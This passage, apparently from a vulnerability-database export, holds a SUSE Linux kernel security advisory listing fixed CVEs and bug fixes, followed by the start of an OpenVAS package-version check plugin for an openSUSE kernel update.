to\n receive various security and bugfixes.\n\n\n The following security bugs were fixed:\n\n - CVE-2017-1000365: The Linux Kernel imposes a size restriction on the\n arguments and environmental strings passed through\n RLIMIT_STACK/RLIM_INFINITY (1/4 of the size), but did not take the\n argument and environment pointers into account, which allowed attackers\n to bypass this limitation (bnc#1039354)\n - CVE-2017-1000112: Prevent race condition in net-packet code that could\n have been exploited by unprivileged users to gain root access.\n (bnc#1052311)\n - 
CVE-2017-1000251: The native Bluetooth stack was vulnerable to a stack\n overflow vulnerability in the processing of L2CAP configuration\n responses resulting in remote code execution in kernel space\n (bnc#1057389)\n - CVE-2017-14051: An integer overflow in the\n qla2x00_sysfs_write_optrom_ctl function in\n drivers/scsi/qla2xxx/qla_attr.c allowed local users to cause a denial of\n service (memory corruption and system crash) by leveraging root access\n (bnc#1056588)\n - CVE-2017-8831: The saa7164_bus_get function allowed local users to cause\n a denial of service (out-of-bounds array access) or possibly have\n unspecified\n other impact by changing a certain sequence-number value, aka a "double\n fetch" vulnerability (bnc#1037994)\n - CVE-2017-1000252: Wrong gsi values via KVM_IRQFD allowed unprivileged\n users using KVM to cause DoS on Intel systems (bsc#1058038).\n - CVE-2017-1000111: Prevent in packet_set_ring on PACKET_RESERVE\n (bsc#1052365).\n - CVE-2017-10810: Memory leak in the virtio_gpu_object_create function in\n drivers/gpu/drm/virtio/virtgpu_object.c allowed attackers to cause a\n denial of service (memory consumption) by triggering\n object-initialization failures (bnc#1047277).\n - CVE-2017-11472: The acpi_ns_terminate() function did not flush the\n operand cache and causes a kernel stack dump, which allowed local users\n to obtain sensitive information from kernel memory and bypass the KASLR\n protection mechanism via a crafted ACPI table (bnc#1049580).\n - CVE-2017-11473: Buffer overflow in the mp_override_legacy_irq() function\n allowed local users to gain privileges via a crafted ACPI table\n (bnc#1049603).\n - CVE-2017-12134: The xen_biovec_phys_mergeable function might have allowed\n local OS guest users to corrupt block device data streams and\n consequently obtain sensitive memory information, cause a denial of\n service, or gain host OS privileges by leveraging incorrect block IO\n merge-ability calculation (bnc#1051790).\n - CVE-2017-12154: 
L2 guest could have accessed hardware(L0) CR8 register\n and crashed the host system (bsc#1058507).\n - CVE-2017-14106: The tcp_disconnect function allowed local users to cause\n a denial of service (__tcp_select_window divide-by-zero error and system\n crash) by triggering a disconnect within a certain tcp_recvmsg code path\n (bnc#1056982).\n - CVE-2017-7518: Faulty debug exception via syscall emulation allowed\n non-linux guests to escalate their privileges in the guest (bsc#1045922).\n - CVE-2017-7533: Race condition in the fsnotify implementation allowed\n local users to gain privileges or cause a denial of service (memory\n corruption) via a crafted application that leverages simultaneous\n execution of the inotify_handle_event and vfs_rename functions\n (bsc#1049483).\n - CVE-2017-7541: The brcmf_cfg80211_mgmt_tx function allowed local users\n to cause a denial of service (buffer overflow and system crash) or\n possibly gain privileges via a crafted NL80211_CMD_FRAME Netlink packet\n (bsc#1049645).\n - CVE-2017-7542: The ip6_find_1stfragopt function allowed local users to\n cause a denial of service (integer overflow and infinite loop) by\n leveraging the ability to open a raw socket (bsc#1049882).\n\n The following non-security bugs were fixed:\n\n - ACPI / processor: Avoid reserving IO regions too early (bsc#1051478).\n - ACPI / scan: Prefer devices without _HID for _ADR matching.\n - ALSA: fm801: Initialize chip after IRQ handler is registered\n (bsc#1031717).\n - ALSA: hda - Add stereo mic quirk for Lenovo G50-70 (17aa:3978)\n (bsc#1020657).\n - ALSA: hda - Fix endless loop of codec configure (bsc#1031717).\n - ALSA: hda - Implement mic-mute LED mode enum (bsc#1055013).\n - ALSA: hda - set input_path bitmap to zero after moving it to new place\n (bsc#1031717).\n - ALSA: hda/realtek - Add support headphone Mic for ALC221 of HP platform\n (bsc#1024405).\n - ALSA: ice1712: Add support for STAudio ADCIII (bsc#1048934).\n - ALSA: usb-audio: Apply sample rate 
quirk to Sennheiser headset\n (bsc#1052580).\n - Add "shutdown" to "struct class" (bsc#1053117).\n - Bluetooth: bnep: fix possible might sleep error in bnep_session\n (bsc#1031784).\n - Bluetooth: cmtp: fix possible might sleep error in cmtp_session\n (bsc#1031784).\n - Bluetooth: hidp: fix possible might sleep error in hidp_session_thread\n (bsc#1031784).\n - Drivers: hv: Fix the bug in generating the guest ID.\n - Drivers: hv: util: Fix a typo.\n - Drivers: hv: vmbus: Get the current time from the current clocksource\n (bnc#1044112, bnc#1042778, bnc#1029693).\n - Drivers: hv: vmbus: Move the code to signal end of message.\n - Drivers: hv: vmbus: Move the definition of generate_guest_id().\n - Drivers: hv: vmbus: Move the definition of hv_x64_msr_hypercall_contents.\n - Drivers: hv: vmbus: Restructure the clockevents code.\n - Fix kABI breakage by KVM CVE fix (bsc#1045922).\n - IB/hfi1: Wait for QSFP modules to initialize (bsc#1019151).\n - Input: gpio-keys - fix check for disabling unsupported keys\n (bsc#1031717).\n - KVM: nVMX: Fix nested VPID vmx exec control (bsc#1051478).\n - KVM: nVMX: fix msr bitmaps to prevent L2 from accessing L0 x2APIC\n (bsc#1051478).\n - KVM: x86: avoid simultaneous queueing of both IRQ and SMI (bsc#1051478).\n - MD: fix sleep in atomic (bsc#1040351).\n - More Git-commit header fixups No functional change intended.\n - NFS: Cache aggressively when file is open for writing (bsc#1033587).\n - NFS: Do not flush caches for a getattr that races with writeback\n (bsc#1033587).\n - NFS: flush data when locking a file to ensure cache coherence for mmap\n (bsc#981309).\n - NFS: invalidate file size when taking a lock (git-fixes).\n - NFS: only invalidate dentrys that are clearly invalid (bsc#1047118).\n - PCI / PM: Fix native PME handling during system suspend/resume\n (bsc#1051478).\n - PCI: Add Mellanox device IDs (bsc#1051478).\n - PCI: Convert Mellanox broken INTx quirks to be for listed devices only\n (bsc#1051478).\n - PCI: Correct 
PCI_STD_RESOURCE_END usage (bsc#1051478).\n - PCI: Enable ECRC only if device supports it (bsc#1051478).\n - PCI: Support INTx masking on ConnectX-4 with firmware x.14.1100+\n (bsc#1051478).\n - PCI: dwc: Fix uninitialized variable in dw_handle_msi_irq()\n (bsc#1051478).\n - PCI: dwc: dra7xx: Use RW1C for IRQSTATUS_MSI and IRQSTATUS_MAIN\n (bsc#1051478).\n - PM / Hibernate: Fix scheduling while atomic during hibernation\n (bsc#1051059).\n - Revert "/proc/iomem: only expose physical resource addresses to\n privileged users" (kabi).\n - Revert "ACPI / video: Add force_native quirk for HP Pavilion dv6"\n (bsc#1031717).\n - Revert "Add "shutdown" to "struct class"." (kabi).\n - Revert "KVM: x86: fix emulation of RSM and IRET instructions" (kabi).\n - Revert "Make file credentials available to the seqfile interfaces"\n (kabi).\n - Revert "mm/list_lru.c: fix list_lru_count_node() to be race free" (kabi).\n - Revert "powerpc/numa: Fix percpu allocations to be NUMA aware"\n (bsc#1048914).\n - Revert "tpm: Issue a TPM2_Shutdown for TPM2 devices." 
(kabi).\n - USB: core: fix device node leak (bsc#1047487).\n - Update kabi files: sync with 4.4.74 updates\n - af_key: Add lock to key dump (bsc#1047653).\n - af_key: Fix slab-out-of-bounds in pfkey_compile_policy (bsc#1047354).\n - b43: Add missing MODULE_FIRMWARE() (bsc#1037344).\n - bcache: force trigger gc (bsc#1038078).\n - bcache: force trigger gc (bsc#1038078).\n - bcache: only recovery I/O error for writethrough mode (bsc#1043652).\n - bcache: only recovery I/O error for writethrough mode (bsc#1043652).\n - bdi: Fix use-after-free in wb_congested_put() (bsc#1040307).\n - blacklist.conf: 9eeacd3a2f17 not a bug fix (bnc#1050061)\n - blacklist.conf: Blacklist c133c7615751 ('x86/nmi: Fix timeout test in\n test_nmi_ipi()') It only fixes a self-test (bsc#1051478).\n - blacklist.conf: Blacklist c9525a3fab63 ('x86/watchdog: Fix Kconfig help\n text file path reference to lockup watchdog documentation') Updates only\n kconfig help-text (bsc#1051478).\n - blacklist.conf: add inapplicable commits for wifi (bsc#1031717)\n - blacklist.conf: add unapplicable drm fixes (bsc#1031717).\n - blacklist.conf: add unapplicable/cosmetic iwlwifi fixes (bsc#1031717).\n - blkfront: add uevent for size change (bnc#1036632).\n - block: Allow bdi re-registration (bsc#1040307).\n - block: Fix front merge check (bsc#1051239).\n - block: Make del_gendisk() safer for disks without queues (bsc#1040307).\n - block: Move bdi_unregister() to del_gendisk() (bsc#1040307).\n - block: do not allow updates through sysfs until registration completes\n (bsc#1047027).\n - bnxt: add a missing rcu synchronization (bnc#1038583).\n - bnxt: do not busy-poll when link is down (bnc#1038583).\n - bnxt_en: Enable MRU enables bit when configuring VNIC MRU (bnc#1038583).\n - bnxt_en: Fix "uninitialized variable" bug in TPA code path (bnc#1038583).\n - bnxt_en: Fix NULL pointer dereference in a failure path during open\n (bnc#1038583).\n - bnxt_en: Fix NULL pointer dereference in reopen failure path\n 
(bnc#1038583).\n - bnxt_en: Fix TX push operation on ARM64 (bnc#1038583).\n - bnxt_en: Fix VF virtual link state (bnc#1038583).\n - bnxt_en: Fix a VXLAN vs GENEVE issue (bnc#1038583).\n - bnxt_en: Fix and clarify link_info->advertising (bnc#1038583).\n - bnxt_en: Fix ring arithmetic in bnxt_setup_tc() (bnc#1038583).\n - bnxt_en: Pad TX packets below 52 bytes (bnc#1038583).\n - bnxt_en: Refactor TPA code path (bnc#1038583).\n - bnxt_en: fix pci cleanup in bnxt_init_one() failure path (bnc#1038583).\n - bnxt_en: initialize rc to zero to avoid returning garbage (bnc#1038583).\n - brcmfmac: Fix glom_skb leak in brcmf_sdiod_recv_chain (bsc#1031717).\n - btrfs: Add WARN_ON for qgroup reserved underflow (bsc#1031515).\n - btrfs: Do not clear SGID when inheriting ACLs (bsc#1030552).\n - btrfs: add cond_resched to btrfs_qgroup_trace_leaf_items (bsc#1028286).\n - btrfs: fix early ENOSPC due to delalloc (bsc#1049226).\n - btrfs: fix lockup in find_free_extent with read-only block groups\n (bsc#1046682).\n - btrfs: incremental send, fix invalid path for link commands\n (bsc#1051479).\n - btrfs: incremental send, fix invalid path for unlink commands\n (bsc#1051479).\n - btrfs: resume qgroup rescan on rw remount (bsc#1047152).\n - btrfs: send, fix invalid path after renaming and linking file\n (bsc#1051479).\n - ceph: fix readpage from fscache (bsc#1057015).\n - cpuidle: dt: Add missing 'of_node_put()' (bnc#1022476).\n - crypto: s5p-sss - fix incorrect usage of scatterlists api (bsc#1048317).\n - cx82310_eth: use skb_cow_head() to deal with cloned skbs (bsc# 1045154).\n - cxgb4: Fix stack out-of-bounds read due to wrong size to\n t4_record_mbox() (bsc#1021424 bsc#1022743).\n - cxl: Unlock on error in probe (bsc#1034762, Pending SUSE Kernel Fixes).\n - dentry name snapshots (bsc#1049483).\n - dm: fix second blk_delay_queue() parameter to be in msec units not\n (bsc#1047670).\n - drivers: hv: vmbus: Increase the time between retries in\n vmbus_post_msg() (bnc#1044112).\n - 
drivers: net: xgene: Fix wrong logical operation (bsc#1056827).\n - drm/amdgpu: Fix overflow of watermark calcs at greater than 4k\n resolutions (bsc#1031717).\n - drm/bochs: Implement nomodeset (bsc#1047096).\n - drm/i915/fbdev: Stop repeating tile configuration on stagnation\n (bsc#1031717).\n - drm/i915: Fix scaler init during CRTC HW state readout (bsc#1031717).\n - drm/i915: Serialize GTT/Aperture accesses on BXT (bsc#1046821).\n - drm/virtio: do not leak bo on drm_gem_object_init failure (bsc#1047277).\n - drm/vmwgfx: Fix large topology crash (bsc#1048155).\n - drm/vmwgfx: Limit max desktop dimensions to 8Kx8K (bsc#1048155).\n - drm/vmwgfx: Support topology greater than texture size (bsc#1048155).\n - efi/libstub: Skip GOP with PIXEL_BLT_ONLY format (bnc#974215).\n - ext2: Do not clear SGID when inheriting ACLs (bsc#1030552).\n - ext4: Do not clear SGID when inheriting ACLs (bsc#1030552).\n - ext4: avoid unnecessary stalls in ext4_evict_inode() (bsc#1049486).\n - ext4: handle the rest of ext4_mb_load_buddy() ENOMEM errors\n (bsc#1012829).\n - fs/fcntl: f_setown, avoid undefined behaviour (bnc#1006180).\n - fuse: initialize the flock flag in fuse_file on allocation (git-fixes).\n - gcov: add support for gcc version greater than 6 (bsc#1051663).\n - gcov: support GCC 7.1 (bsc#1051663).\n - gfs2: Do not clear SGID when inheriting ACLs (bsc#1012829).\n - gfs2: fix flock panic issue (bsc#1012829).\n - hrtimer: Catch invalid clockids again (bsc#1047651).\n - hrtimer: Revert CLOCK_MONOTONIC_RAW support (bsc#1047651).\n - hv_util: switch to using timespec64.\n - hv_utils: drop .getcrosststamp() support from PTP driver (bnc#1044112,\n bnc#1042778, bnc#1029693).\n - hv_utils: fix TimeSync work on pre-TimeSync-v4 hosts (bnc#1044112,\n bnc#1042778, bnc#1029693).\n - i2c: designware-baytrail: fix potential null pointer dereference on dev\n (bsc#1011913).\n - i40e: Removal of workaround for simple MAC address filter deletion\n (bsc#1039915).\n - i40e: When searching all 
MAC/VLAN filters, ignore removed filters\n (bsc#1039915).\n - i40e: add VSI info to macaddr messages (bsc#1039915).\n - i40e: add hw struct local variable (bsc#1039915).\n - i40e: add private flag to control source pruning (bsc#1034075).\n - i40e: avoid O(n^2) loop when deleting all filters (bsc#1039915).\n - i40e: avoid looping to check whether we're in VLAN mode (bsc#1039915).\n - i40e: delete filter after adding its replacement when converting\n (bsc#1039915).\n - i40e: do not add broadcast filter for VFs (bsc#1039915).\n - i40e: do not allow i40e_vsi_(add|kill)_vlan to operate when VID lower\n than 1 (bsc#1039915).\n - i40e: drop is_vf and is_netdev fields in struct i40e_mac_filter\n (bsc#1039915).\n - i40e: enable VSI broadcast promiscuous mode instead of adding broadcast\n filter (bsc#1039915).\n - i40e: factor out addition/deletion of VLAN per each MAC address\n (bsc#1039915).\n - i40e: fix MAC filters when removing VLANs (bsc#1039915).\n - i40e: fold the i40e_is_vsi_in_vlan check into i40e_put_mac_in_vlan\n (bsc#1039915).\n - i40e: implement __i40e_del_filter and use where applicable (bsc#1039915).\n - i40e: make use of __dev_uc_sync and __dev_mc_sync (bsc#1039915).\n - i40e: move all updates for VLAN mode into i40e_sync_vsi_filters\n (bsc#1039915).\n - i40e: move i40e_put_mac_in_vlan and i40e_del_mac_all_vlan (bsc#1039915).\n - i40e: no need to check is_vsi_in_vlan before calling\n i40e_del_mac_all_vlan (bsc#1039915).\n - i40e: properly cleanup on allocation failure in i40e_sync_vsi_filters\n (bsc#1039915).\n - i40e: recalculate vsi->active_filters from hash contents (bsc#1039915).\n - i40e: refactor Rx filter handling (bsc#1039915).\n - i40e: refactor i40e_put_mac_in_vlan to avoid changing f->vlan\n (bsc#1039915).\n - i40e: refactor i40e_update_filter_state to avoid passing aq_err\n (bsc#1039915).\n - i40e: remove code to handle dev_addr specially (bsc#1039915).\n - i40e: remove duplicate add/delete adminq command code for filters\n (bsc#1039915).\n - 
i40e: remove second check of VLAN_N_VID in i40e_vlan_rx_add_vid\n (bsc#1039915).\n - i40e: removed unreachable code (bsc#1039915).\n - i40e: rename i40e_put_mac_in_vlan and i40e_del_mac_all_vlan\n (bsc#1039915).\n - i40e: restore workaround for removing default MAC filter (bsc#1039915).\n - i40e: set broadcast promiscuous mode for each active VLAN (bsc#1039915).\n - i40e: store MAC/VLAN filters in a hash with the MAC Address as key\n (bsc#1039915).\n - i40e: use (add|rm)_vlan_all_mac helper functions when changing PVID\n (bsc#1039915).\n - i40e: when adding or removing MAC filters, correctly handle VLANs\n (bsc#1039915).\n - i40e: write HENA for VFs (bsc#1039915).\n - ibmvnic: Check for transport event on driver resume (bsc#1051556,\n bsc#1052709).\n - ibmvnic: Clean up resources on probe failure (bsc#1058116).\n - ibmvnic: Initialize SCRQ's during login renegotiation (bsc#1052223).\n - ibmvnic: Report rx buffer return codes as netdev_dbg (bsc#1052794).\n - iio: hid-sensor: fix return of -EINVAL on invalid values in ret or value\n (bsc#1031717).\n - introduce the walk_process_tree() helper (bnc#1022476).\n - iommu/amd: Fix schedule-while-atomic BUG in initialization code\n (bsc1052533).\n - ipv4: Should use consistent conditional judgement for ip fragment in\n __ip_append_data and ip_finish_output (bsc#1041958).\n - ipv6: Should use consistent conditional judgement for ip6 fragment\n between __ip6_append_data and ip6_finish_output (bsc#1041958).\n - iwlwifi: missing error code in iwl_trans_pcie_alloc() (bsc#1031717).\n - iwlwifi: mvm: compare full command ID.\n - iwlwifi: mvm: do not send CTDP commands via debugfs if not supported\n (bsc#1031717).\n - iwlwifi: mvm: reset the fw_dump_desc pointer after ASSERT (bsc#1031717).\n - iwlwifi: mvm: synchronize firmware DMA paging memory.\n - iwlwifi: mvm: unconditionally stop device after init (bsc#1031717).\n - iwlwifi: mvm: unmap the paging memory before freeing it.\n - iwlwifi: pcie: fix command completion name debug 
(bsc#1031717).\n - kABI-fix for "x86/panic: replace smp_send_stop() with kdump friendly\n version in panic path" (bsc#1051478).\n - kernel/*: switch to memdup_user_nul() (bsc#1048893).\n - kvm: nVMX: Fix nested_vmx_check_msr_bitmap_controls (bsc#1051478).\n - lib: test_rhashtable: Fix KASAN warning (bsc#1055359).\n - lib: test_rhashtable: fix for large entry counts (bsc#1055359).\n - libnvdimm, pmem: fix a NULL pointer BUG in nd_pmem_notify (bsc#1023175).\n - libnvdimm: fix badblock range handling of ARS range (bsc#1023175).\n - lightnvm: nvme reset_controller is not working after adapter's firmware\n upgrade (bsc#988784).\n - lightnvm: remove unused rq parameter of nvme_nvm_rqtocmd() to kill\n warning.\n - mac80211_hwsim: Replace bogus hrtimer clockid (bsc#1047651).\n - md/raid5: fix a race condition in stripe batch (linux-stable).\n - mm, madvise: ensure poisoned pages are removed from per-cpu lists (VM hw\n poison -- git fixes).\n - mm-adaptive-hash-table-scaling-v5 (bnc#1036303).\n - mm/page_alloc.c: apply gfp_allowed_mask before the first allocation\n attempt (bnc#971975 VM -- git fixes).\n - mm: adaptive hash table scaling (bnc#1036303).\n - mm: call page_ext_init() after all struct pages are initialized (VM\n Debugging Functionality, bsc#1047048).\n - mm: drop HASH_ADAPT (bnc#1036303).\n - mm: fix classzone_idx underflow in shrink_zones() (VM Functionality,\n bsc#1042314).\n - mm: make PR_SET_THP_DISABLE immediately active (bnc#1048891).\n - mptsas: Fixup device hotplug for VMWare ESXi (bsc#1030850).\n - mwifiex: do not update MCS set from hostapd (bsc#1031717).\n - net/mlx5: Fix driver load error flow when firmware is stuck (git-fixes).\n - net: account for current skb length when deciding about UFO\n (bsc#1041958).\n - net: ena: add hardware hints capability to the driver (bsc#1047121).\n - net: ena: add missing return when ena_com_get_io_handlers() fails\n (bsc#1047121).\n - net: ena: add missing unmap bars on device removal (bsc#1047121).\n - net: ena: 
add reset reason for each device FLR (bsc#1047121).\n - net: ena: add support for out of order rx buffers refill (bsc#1047121).\n - net: ena: allow the driver to work with small number of msix vectors\n (bsc#1047121).\n - net: ena: bug fix in lost tx packets detection mechanism (bsc#1047121).\n - net: ena: change return value for unsupported features unsupported\n return value (bsc#1047121).\n - net: ena: change sizeof() argument to be the type pointer (bsc#1047121).\n - net: ena: disable admin msix while working in polling mode (bsc#1047121).\n - net: ena: fix bug that might cause hang after consecutive open/close\n interface (bsc#1047121).\n - net: ena: fix race condition between submit and completion admin command\n (bsc#1047121).\n - net: ena: fix rare uncompleted admin command false alarm (bsc#1047121).\n - net: ena: fix theoretical Rx hang on low memory systems (bsc#1047121).\n - net: ena: separate skb allocation to dedicated function (bsc#1047121).\n - net: ena: update driver's rx drop statistics (bsc#1047121).\n - net: ena: update ena driver to version 1.1.7 (bsc#1047121).\n - net: ena: update ena driver to version 1.2.0 (bsc#1047121).\n - net: ena: use lower_32_bits()/upper_32_bits() to split dma address\n (bsc#1047121).\n - net: ena: use napi_schedule_irqoff when possible (bsc#1047121).\n - net: handle NAPI_GRO_FREE_STOLEN_HEAD case also in napi_frags_finish()\n (bsc#1042286).\n - net: phy: Do not perform software reset for Generic PHY (bsc#1042286).\n - netfilter: fix IS_ERR_VALUE usage (bsc#1052888).\n - netfilter: x_tables: pack percpu counter allocations (bsc#1052888).\n - netfilter: x_tables: pass xt_counters struct instead of packet counter\n (bsc#1052888).\n - netfilter: x_tables: pass xt_counters struct to counter allocator\n (bsc#1052888).\n - new helper: memdup_user_nul() (bsc#1048893).\n - ocfs2: Do not clear SGID when inheriting ACLs (bsc#1030552).\n - ocfs2: Make ocfs2_set_acl() static (bsc#1030552).\n - ocfs2: fix deadlock caused by 
recursive locking in xattr (bsc#1012829).\n - of: fix "/cpus" reference leak in of_numa_parse_cpu_nodes()\n (bsc#1056827).\n - ovl: fix dentry leak for default_permissions (bsc#1054084).\n - percpu_ref: allow operation mode switching operations to be called\n concurrently (bsc#1055096).\n - percpu_ref: remove unnecessary RCU grace period for staggered atomic\n switching confirmation (bsc#1055096).\n - percpu_ref: reorganize __percpu_ref_switch_to_atomic() and relocate\n percpu_ref_switch_to_atomic() (bsc#1055096).\n - percpu_ref: restructure operation mode switching (bsc#1055096).\n - percpu_ref: unify staggered atomic switching wait behavior (bsc#1055096).\n - perf/x86/intel: Cure bogus unwind from PEBS entries (bsc#1051478).\n - perf/x86/intel: Fix PEBSv3 record drain (bsc#1051478).\n - perf/x86: Fix spurious NMI with PEBS Load Latency event (bsc#1051478).\n - platform/x86: ideapad-laptop: Add IdeaPad 310-15IKB to no_hw_rfkill\n (bsc#1051022).\n - platform/x86: ideapad-laptop: Add IdeaPad V310-15ISK to no_hw_rfkill\n (bsc#1051022).\n - platform/x86: ideapad-laptop: Add IdeaPad V510-15IKB to no_hw_rfkill\n (bsc#1051022).\n - platform/x86: ideapad-laptop: Add Lenovo Yoga 910-13IKB to no_hw_rfkill\n dmi list (bsc#1051022).\n - platform/x86: ideapad-laptop: Add Y520-15IKBN to no_hw_rfkill\n (bsc#1051022).\n - platform/x86: ideapad-laptop: Add Y700 15-ACZ to no_hw_rfkill DMI list\n (bsc#1051022).\n - platform/x86: ideapad-laptop: Add Y720-15IKBN to no_hw_rfkill\n (bsc#1051022).\n - platform/x86: ideapad-laptop: Add several models to no_hw_rfkill\n (bsc#1051022).\n - prctl: propagate has_child_subreaper flag to every descendant\n (bnc#1022476).\n - qeth: fix L3 next-hop im xmit qeth hdr (bnc#1052773, LTC#157374).\n - reiserfs: Do not clear SGID when inheriting ACLs (bsc#1030552).\n - rpm/kernel-binary.spec.in: find-debuginfo.sh should not touch build-id\n This needs rpm-4.14+ (bsc#964063).\n - rtnetlink: fix rtnl_vfinfo_size (bsc#1056261).\n - s390: export symbols for 
crash-kmp (bsc#1053915).\n - sched/core: Allow __sched_setscheduler() in interrupts when PI is not\n used (bnc#1022476).\n - sched/debug: Print the scheduler topology group mask (bnc#1022476).\n - sched/fair, cpumask: Export for_each_cpu_wrap() (bnc#1022476).\n - sched/fair: Fix O(nr_cgroups) in load balance path (bnc#1022476).\n - sched/fair: Use task_groups instead of leaf_cfs_rq_list to walk all\n cfs_rqs (bnc#1022476).\n - sched/topology: Add sched_group_capacity debugging (bnc#1022476).\n - sched/topology: Fix building of overlapping sched-groups (bnc#1022476).\n - sched/topology: Fix overlapping sched_group_capacity (bnc#1022476).\n - sched/topology: Move comment about asymmetric node setups (bnc#1022476).\n - sched/topology: Refactor function build_overlap_sched_groups()\n (bnc#1022476).\n - sched/topology: Remove FORCE_SD_OVERLAP (bnc#1022476).\n - sched/topology: Simplify build_overlap_sched_groups() (bnc#1022476).\n - sched/topology: Small cleanup (bnc#1022476).\n - sched/topology: Verify the first group matches the child domain\n (bnc#1022476).\n - scsi: Add STARGET_CREATE_REMOVE state to scsi_target_state (bsc#1013887).\n - scsi: bnx2i: missing error code in bnx2i_ep_connect() (bsc#1048221).\n - scsi: kABI fix for new state STARGET_CREATED_REMOVE (bsc#1013887).\n - scsi: storvsc: Workaround for virtual DVD SCSI version (bnc#1044636).\n - scsi_devinfo: fixup string compare (bsc#1037404).\n - scsi_dh_alua: suppress errors from unsupported devices (bsc#1038792).\n - smsc75xx: use skb_cow_head() to deal with cloned skbs (bsc#1045154).\n - sr9700: use skb_cow_head() to deal with cloned skbs (bsc#1045154).\n - supported.conf: clear mistaken external support flag for cifs.ko\n (bsc#1053802).\n - sysctl: do not print negative flag for proc_douintvec (bnc#1046985).\n - sysctl: fix lax sysctl_check_table() sanity check (bsc#1048893).\n - sysctl: fold sysctl_writes_strict checks into helper (bsc#1048893).\n - sysctl: kdoc'ify sysctl_writes_strict (bsc#1048893).\n 
- sysctl: simplify unsigned int support (bsc#1048893).\n - timers: Plug locking race vs. timer migration (bnc#1022476).\n - tpm: Issue a TPM2_Shutdown for TPM2 devices (bsc#1053117).\n - tpm: KABI fix (bsc#1053117).\n - tpm: fix: return rc when devm_add_action() fails (bsc#1020645,\n bsc#1034048).\n - tpm: read burstcount from TPM_STS in one 32-bit transaction\n (bsc#1020645, bsc#1034048).\n - tpm_tis_core: Choose appropriate timeout for reading burstcount\n (bsc#1020645, bsc#1034048).\n - tpm_tis_core: convert max timeouts from msec to jiffies (bsc#1020645,\n bsc#1034048).\n - tty: serial: msm: Support more bauds (git-fixes).\n - ubifs: Correctly evict xattr inodes (bsc#1012829).\n - ubifs: Do not leak kernel memory to the MTD (bsc#1012829).\n - udf: Fix deadlock between writeback and udf_setsize() (bsc#1012829).\n - udf: Fix races with i_size changes during readpage (bsc#1012829).\n - vfs: fix missing inode_get_dev sites (bsc#1052049).\n - x86/LDT: Print the real LDT base address (bsc#1051478).\n - x86/dmi: Switch dmi_remap() from ioremap() to ioremap_cache()\n (bsc#1051399).\n - x86/mce: Make timer handling more robust (bsc#1042422).\n - x86/panic: replace smp_send_stop() with kdump friendly version in panic\n path (bsc#1051478).\n - xen-netfront: Rework the fix for Rx stall during OOM and network stress\n (git-fixes).\n - xen/balloon: do not online new memory initially (bnc#1028173).\n - xen/pvh*: Support greater than 32 VCPUs at domain restore (bnc#1045563).\n - xen: allocate page for shared info page from low memory (bnc#1038616).\n - xen: hold lock_device_hotplug throughout vcpu hotplug operations\n (bsc#1042422).\n - xfrm: NULL dereference on allocation failure (bsc#1047343).\n - xfrm: Oops on error in pfkey_msg2xfrm_state() (bsc#1047653).\n - xfs: Do not clear SGID when inheriting ACLs (bsc#1030552).\n - xfs: do not BUG() on mixed direct and mapped I/O (bsc#1050188).\n - xfs: fix inobt inode allocation search optimization (bsc#1012829).\n\n", "edition": 1, 
"modified": "2017-11-08T21:08:45", "published": "2017-11-08T21:08:45", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-11/msg00013.html", "id": "SUSE-SU-2017:2956-1", "type": "suse", "title": "Security update for the Linux Kernel (important)", "cvss": {"score": 8.3, "vector": "AV:ADJACENT_NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2020-01-31T18:26:55", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-14489", "CVE-2017-1000252", "CVE-2017-12153", "CVE-2017-12154"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2017-10-18T00:00:00", "id": "OPENVAS:1361412562310851628", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851628", "type": "openvas", "title": "openSUSE: Security Advisory for kernel (openSUSE-SU-2017:2739-1)", "sourceData": "# Copyright (C) 2017 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851628\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-10-18 16:55:05 +0200 (Wed, 18 Oct 2017)\");\n script_cve_id(\"CVE-2017-1000252\", \"CVE-2017-12153\", \"CVE-2017-12154\", \"CVE-2017-14489\");\n script_tag(name:\"cvss_base\", value:\"4.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for kernel (openSUSE-SU-2017:2739-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The openSUSE Leap 42.2 Kernel was updated to 4.4.90 to receive various\n security and bugfixes.\n\n\n The following security bugs were fixed:\n\n - CVE-2017-1000252: The KVM subsystem in the Linux kernel allowed guest OS\n users to cause a denial of service (assertion failure, and hypervisor\n hang or crash) via an out-of bounds guest_irq value, related to\n arch/x86/kvm/vmx.c and virt/kvm/eventfd.c (bnc#1058038).\n\n - CVE-2017-14489: The iscsi_if_rx function in\n drivers/scsi/scsi_transport_iscsi.c in the Linux kernel allowed local\n users to cause a denial of service (panic) by leveraging incorrect\n length validation (bnc#1059051).\n\n - CVE-2017-12153: A security flaw was discovered in the\n nl80211_set_rekey_data() function in 
